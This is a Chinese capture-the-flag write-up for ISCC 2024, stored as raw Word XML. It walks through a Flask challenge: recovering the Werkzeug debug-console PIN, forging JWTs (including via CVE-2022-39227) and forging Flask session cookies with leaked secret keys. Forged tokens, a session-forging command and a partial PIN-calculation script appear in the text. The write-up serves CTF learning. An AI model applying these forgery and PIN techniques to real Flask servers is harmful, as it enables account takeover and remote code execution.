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21AB43F2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>SCC2024 WriteUp</w:t>
      </w:r>
      <w:r w:rsidR="00484B66" w:rsidRPr="00C346CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6548DD" w14:textId="2946F1A8" w:rsidR="006833D9" w:rsidRDefault="006833D9" w:rsidP="006833D9">
      <w:r w:rsidRPr="001B495D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="001B495D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hooops+李卓航+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>925798691@qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1B7B44" w14:textId="4D35075B" w:rsidR="006833D9" w:rsidRPr="006833D9" w:rsidRDefault="006833D9" w:rsidP="006833D9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">eb </w:t>
      </w:r>
      <w:r w:rsidRPr="006833D9">
        <w:t>Flask中的pin值计算</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76CDE5" w14:textId="77B2D193" w:rsidR="00AF064E" w:rsidRPr="00AF064E" w:rsidRDefault="00AF064E" w:rsidP="006D7CD7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03034674" w14:textId="18A85A3C" w:rsidR="00AF064E" w:rsidRDefault="00FB137E" w:rsidP="00FB137E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96FB646" wp14:editId="76FEE4AD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-57150</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>360680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="3512185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="2147472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728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看到flask的pin值计算：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2AF4A9" w14:textId="65BE0EE5" w:rsidR="009B08C3" w:rsidRDefault="009B08C3" w:rsidP="00FB137E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B08C3">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69645377" wp14:editId="0993E38A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3988435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="3121025"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="10260789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7893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访问console确定要对pin值进行计算：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2A27D5" w14:textId="79E649BF" w:rsidR="00AF064E" w:rsidRDefault="001F7B74" w:rsidP="001F7B74">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0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58EE6EF" wp14:editId="591A54CF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1130300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>349250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2781300" cy="1098550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="112689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9094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F12看到提示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6548E5" w14:textId="734F4789" w:rsidR="001F7B74" w:rsidRDefault="001F7B74" w:rsidP="001F7B74">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED959F6" w14:textId="1AA205C5" w:rsidR="005157AC" w:rsidRDefault="005157AC" w:rsidP="001A6A59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ACA652E" wp14:editId="030C53C8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>44450</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>450850</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="2884170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="490531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53132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访问：</w:t>
      </w:r>
      <w:r w:rsidRPr="005157AC">
        <w:t>/getusername</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB0EA85" w14:textId="29A56C7C" w:rsidR="001A6A59" w:rsidRDefault="001A6A59" w:rsidP="001A6A59">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745BAA4F" w14:textId="1C28C400" w:rsidR="001A6A59" w:rsidRDefault="001A6A59" w:rsidP="001A6A59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 xml:space="preserve">输入app.py得到  </w:t>
      </w:r>
      <w:r w:rsidRPr="001A6A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/crawler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C6CE28" w14:textId="61285B8E" w:rsidR="001A6A59" w:rsidRDefault="001A6A59" w:rsidP="001A6A59"/>
    <w:p w14:paraId="09EA1606" w14:textId="427D8F3A" w:rsidR="001A6A59" w:rsidRDefault="001A6A59" w:rsidP="001A6A59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8804A7D" wp14:editId="3DCC5820">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>590550</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3543300" cy="1568450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="14612885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8850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访问</w:t>
      </w:r>
      <w:r w:rsidRPr="001A6A59">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A6A59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/crawler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 得到计算</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B68F836" w14:textId="6BCFA19F" w:rsidR="001A6A59" w:rsidRDefault="001A6A59" w:rsidP="001A6A59">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A6BF71" w14:textId="77777777" w:rsidR="00463C49" w:rsidRDefault="001A6A59" w:rsidP="00EA3779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DE9FCD7" wp14:editId="422754CC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>69850</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>101600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1759585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="732891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89132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写脚本过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C5185C" w14:textId="3A9CCC09" w:rsidR="00AF5A79" w:rsidRDefault="00AF5A79" w:rsidP="00EA3779">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF5A79">
        <w:t>import requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5A79">
        <w:cr/>
        <w:t>response1 = requests.get('http://101.200.138.180:10006/get_expression')</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5A79">
        <w:cr/>
        <w:t>response2 = requests.get('http://101.200.138.180:10006/crawler?answer={}'.format(eval(response1.json()['expression'].replace("÷","/").replace("×","*"))))</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5A79">
        <w:cr/>
        <w:t>print(response2.text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617B5056" w14:textId="0377619C" w:rsidR="00463C49" w:rsidRDefault="00463C49" w:rsidP="00463C49">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A01A4B" w14:textId="712877B5" w:rsidR="00EA3779" w:rsidRDefault="00AF5A79" w:rsidP="00463C49">
      <w:r w:rsidRPr="00AF5A79">
        <w:t>&lt;h1&gt;/usr/local/lib/python3.11/site-packages/flask/app.py&lt;/h1&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5A79">
        <w:cr/>
        <w:t>&lt;h1&gt;uuidnode_mac位于/woddenfish&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDB8A90" w14:textId="7D50EC91" w:rsidR="00AF5A79" w:rsidRDefault="00AF5A79" w:rsidP="00463C49"/>
    <w:p w14:paraId="1A024E4A" w14:textId="32216CB8" w:rsidR="000160DB" w:rsidRDefault="000160DB" w:rsidP="00EA3779"/>
    <w:p w14:paraId="5581A8CB" w14:textId="3DF50454" w:rsidR="00AF5A79" w:rsidRDefault="00AF5A79" w:rsidP="000160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访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF5A79">
        <w:t>/woddenfish</w:t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D4CA4DA" wp14:editId="63F60736">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>520065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="2901950"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="16043427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42739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功德：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C01865" w14:textId="3F858C9B" w:rsidR="00AF5A79" w:rsidRDefault="00AF5A79" w:rsidP="00AF5A79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F5B3E7D" w14:textId="77777777" w:rsidR="00E575C5" w:rsidRDefault="00E575C5" w:rsidP="00E575C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由下session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102E1FB0" w14:textId="77777777" w:rsidR="00E575C5" w:rsidRDefault="00E575C5" w:rsidP="00E575C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用jwt伪造发包修改功德数，源码里有个字符串“</w:t>
      </w:r>
      <w:r>
        <w:t>ISCC_muyu_2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”可能是双向加密的密钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1473D1FB" w14:textId="77777777" w:rsidR="00E575C5" w:rsidRDefault="00E575C5" w:rsidP="00E575C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再通过jwt.io生成负数的quantity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F09DE6" w14:textId="77777777" w:rsidR="00E575C5" w:rsidRDefault="00E575C5" w:rsidP="00E575C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终payload:</w:t>
      </w:r>
      <w:r w:rsidRPr="000365D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBF8D8A" w14:textId="77777777" w:rsidR="00E575C5" w:rsidRDefault="00E575C5" w:rsidP="00E575C5">
      <w:r w:rsidRPr="000365D3">
        <w:t>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiZG9uYXRlIiwicXVhbnRpdHkiOi0xMDAwMH0.ZN5ynXCpelPPdzoCGBG2hgMKPt7THEQ3EQMH3jDAI5E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738C8164" w14:textId="44E631C5" w:rsidR="00E575C5" w:rsidRDefault="00E575C5" w:rsidP="00E575C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发送后获得回显 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF35D99" w14:textId="7AA1B257" w:rsidR="00E575C5" w:rsidRDefault="00E575C5" w:rsidP="00E575C5">
      <w:r>
        <w:t>"佛曰：功德圆满。地址02:42:ac:18:00:02:,机器码提示给你了/machine_id"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36548EE4" w14:textId="07AF82D4" w:rsidR="00E575C5" w:rsidRDefault="00CA0E42" w:rsidP="000160DB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars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0FAFD83" wp14:editId="733AA334">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>120650</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>374650</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="766445"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1810657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657419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访问/machine_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A92173" w14:textId="77777777" w:rsidR="00A357C2" w:rsidRDefault="00A357C2" w:rsidP="00A357C2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现flask的session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解密后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ro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member</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0DE09D" w14:textId="275ADAB1" w:rsidR="00CA0E42" w:rsidRDefault="00A357C2" w:rsidP="00D10234">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取密钥伪造session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 找到</w:t>
      </w:r>
      <w:r w:rsidRPr="000555F3">
        <w:t>CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000555F3">
        <w:t>2022-39227</w:t>
      </w:r>
      <w:r w:rsidR="00D10234">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，跑脚本得到</w:t>
      </w:r>
      <w:r w:rsidR="003F4582">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload:</w:t>
      </w:r>
      <w:r w:rsidR="003F4582">
        <w:br/>
      </w:r>
      <w:r w:rsidR="003F4582" w:rsidRPr="00AE199C">
        <w:t xml:space="preserve"> {" eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTQ1NTUwMjksImlhdCI6MTcxNDU1MTQyOSwianRpIjoiNVFFUklBdmtzSWlGanBDQkgyd3JQUSIsIm5iZiI6MTcxNDU1MTQyOSwicm9sZSI6InZpcCIsInVzZXJuYW1lIjoiSVNDQ21lbWJlciJ9.":"","protected":"eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9", "payload":"eyJleHAiOjE3MTQ1NTUwMjksImlhdCI6MTcxNDU1MTQyOSwianRpIjoiNVFFUklBdmtzSWlGanBDQkgyd3JQUSIsIm5iZiI6MTcxNDU1MTQyOSwicm9sZSI6Im1lbWJlciIsInVzZXJuYW1lIjoiSVNDQ21lbWJlciJ9","signature":"a8xnjhqvaTypdbMUjdHMxusl08DYx4BL3VR50lSgT3O6i0x86oo0At9AsXQF7WAriE3jtknmjWoW2fcahZoUBPN_w4fnTshuMNjIEjeZHpu9pDDpXu7UaD3PUID3UupZDfmRzo9HIM-nC2iufdB20EvpzobxqfMGIafKUHr86XrRrH6Gq8EKKOggbJwCjZWjEwUrB_HIWfOkOW6Au77vlWyumg6QVOvykg_uwrfM6VTrGKA1yujbpmYvJ8wa5TWMpq2UqhfaTgFu35-k4jiue1VHOWv3BZHybtrg8k2fgI8_ShQGicxVheB8KMiF96_iU65gn54r_ygNaqz95aupvQ"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0885D212" w14:textId="77777777" w:rsidR="001B3B3B" w:rsidRDefault="001B3B3B" w:rsidP="001B3B3B">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>将payload传给</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00636EFA">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://101.200.138.180:10006/vipprice?token=</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2888E933" w14:textId="77777777" w:rsidR="001B3B3B" w:rsidRDefault="001B3B3B" w:rsidP="001B3B3B">
      <w:pPr>
        <w:widowControl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得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>"welcome_to_iscc_club"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>找到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>密钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D8B916" w14:textId="0A5CE34E" w:rsidR="001B3B3B" w:rsidRDefault="001B3B3B" w:rsidP="001B3B3B">
      <w:pPr>
        <w:widowControl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伪造flask:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65412B79" w14:textId="27671668" w:rsidR="001B3B3B" w:rsidRDefault="001B3B3B" w:rsidP="001B3B3B">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE199C">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>python3 flask.py encode -s welcome_to_iscc_club -t "{'role':'supervip'}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102DC0CA" w14:textId="77777777" w:rsidR="001B3B3B" w:rsidRDefault="001B3B3B" w:rsidP="001B3B3B">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>最终伪造的payload:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE199C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE199C">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>eyJyb2xlIjoic3VwZXJ2aXAifQ.ZjH8cg.KyZ7SWW694ItL5k5AM9_E_Do7yI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B81837" w14:textId="10998438" w:rsidR="001B3B3B" w:rsidRPr="001B3B3B" w:rsidRDefault="001B3B3B" w:rsidP="001B3B3B">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE199C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>acff8a1c-6825-4b9b-b8e1-8983ce1a8b94</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C6458D" w14:textId="43D7513E" w:rsidR="000160DB" w:rsidRDefault="00AC4F99" w:rsidP="000160D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得到</w:t>
      </w:r>
      <w:r w:rsidR="000160DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>username：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE56111" w14:textId="40E9449B" w:rsidR="000160DB" w:rsidRDefault="00AC4F99" w:rsidP="000160DB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r w:rsidR="00DD1624" w:rsidRPr="00DD1624">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>告诉我</w:t>
      </w:r>
      <w:r w:rsidR="00DD1624" w:rsidRPr="00DD1624">
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056485BD" w14:textId="25E7FC84" w:rsidR="00AC4F99" w:rsidRDefault="00DD1624" w:rsidP="000160DB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5259222F" wp14:editId="13EC2F8D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-76200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>438150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="2534920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1490092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928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得到：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046627D3" w14:textId="55FAEFDB" w:rsidR="00DD1624" w:rsidRDefault="004B339D" w:rsidP="001B3B3B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>借助脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E36865F" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCDB6C9" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>from itertools import chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA39C6" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>import argparse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B74B68" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40D48C9A" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>def getMd5Pin(probably_public_bits, private_bits):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3522D626" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    h = hashlib.md5()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147E405B" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for bit in chain(probably_public_bits, private_bits):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A77A0A6" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if not bit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5AE5FB" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C35BAAE" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if isinstance(bit, str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74477FA6" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            bit = bit.encode('utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F8E65B" w14:textId="77777777" w:rsidR="004B339D" w:rsidRDefault="004B339D" w:rsidP="004B339D">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        h.update(bit)</w:t>
      </w:r>
    </w:p>
